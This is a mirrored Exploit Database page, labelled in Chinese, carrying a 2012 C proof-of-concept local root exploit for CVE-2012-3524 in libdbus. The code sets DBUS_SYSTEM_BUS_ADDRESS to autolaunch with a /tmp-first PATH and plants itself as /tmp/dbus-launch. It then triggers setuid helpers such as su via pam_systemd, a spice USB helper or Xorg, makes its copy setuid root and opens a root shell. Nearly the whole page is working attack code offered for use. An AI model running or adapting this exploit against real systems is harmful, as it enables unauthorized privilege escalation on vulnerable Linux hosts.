libdbus – ‘DBUS_SYSTEM_BUS_ADDRESS’ Local Privilege Escalation

• Exploit Database
• 104 阅读

• 作者： Sebastian Krahmer
  日期： 2012-07-17
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/21323/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116

  /* dzug.c CVE-2012-3524 PoC (C) 2012 Sebastian Krahmer * * Trivial non-dbus root exploit. (Yes, it is 2012!) * * The underlying bug (insecure getenv() by default) has been * reported ages ago, but nobody really cared. Unless you have an * exploit... * */   #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/signal.h> #include <sys/stat.h>     int main(int argc, char **argv) { int i = 0; struct stat st; pid_t pid = 0; char *env[] = { "PATH=/tmp:/usr/bin:/usr/sbin:/sbin:/bin", "DBUS_STARTER_BUS_TYPE=system", "DBUS_SYSTEM_BUS_ADDRESS=autolaunch:", NULL, NULL };     /* the pam_systemd vector */ char *su[] = {"/bin/su", NULL, "blah", NULL};   /* the spice vector */ char *spice[] = {"/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper", NULL};   /* the Xorg vector, for older Linux dists and Solaris */ char *xorg[] = {"/usr/bin/Xorg", ":7350", NULL};   char **a = xorg; char *dbus[] = {"/tmp/dbus-launch", NULL}; char *sh[] = {"/bin/bash", "--noprofile", "--norc", NULL}; char me[0x1000];   if (geteuid() == 0 && argc > 1) { chown("/tmp/dbus-launch", 0, 0); chmod("/tmp/dbus-launch", 04755); exit(errno); } else if (geteuid() == 0) { setuid(0); execve(*sh, sh, NULL); return errno; }   printf("[**] CVE-2012-3524 xSports -- this is not a dbus exploit!\n\n[*] Preparing ...\n"); memset(me, 0, sizeof(me));   if (readlink("/proc/self/exe", me, sizeof(me) - 1) < 0) { /* Solaris */ readlink("/proc/self/path/a.out", me, sizeof(me) - 1); } symlink(me, "/tmp/dbus-launch");   if (stat(spice[0], &st) == 0) { if ((st.st_mode & 04000) == 04000) { printf("[+] Using spice helper ...\n"); a = spice; } } else if (stat("/lib64/security/pam_systemd.so", &st) == 0) { printf("[+] Using pam_systemd helper (type user passwd when asked) ...\n"); env[3] = "DISPLAY=:7350"; su[1] = getenv("USER"); a = su; } else if (stat(xorg[0], &st) == 0) { if ((st.st_mode & 04000) == 04000) printf("[+] Using Xorg helper ...\n"); else { printf("[-] No suitable suid helper found.\n"); exit(0); } } else { printf("[-] No suitable suid helper found.\n"); exit(0); }   if ((pid = fork()) == 0) { execve(*a, a, env); exit(0); }   printf("[*] Waiting 10s for dbus-launch to drop boomshell.\n");   for (i = 0; i < 10; ++i) { sleep(1); printf("."); fflush(stdout); } kill(pid, SIGKILL); waitpid(pid, NULL, 0);   for (;;) { stat(*dbus, &st); if ((st.st_mode & 04755) == 04755) break; sleep(1); } printf("\n[!] Hurra!\n");   execve(*dbus, dbus, NULL); return errno; }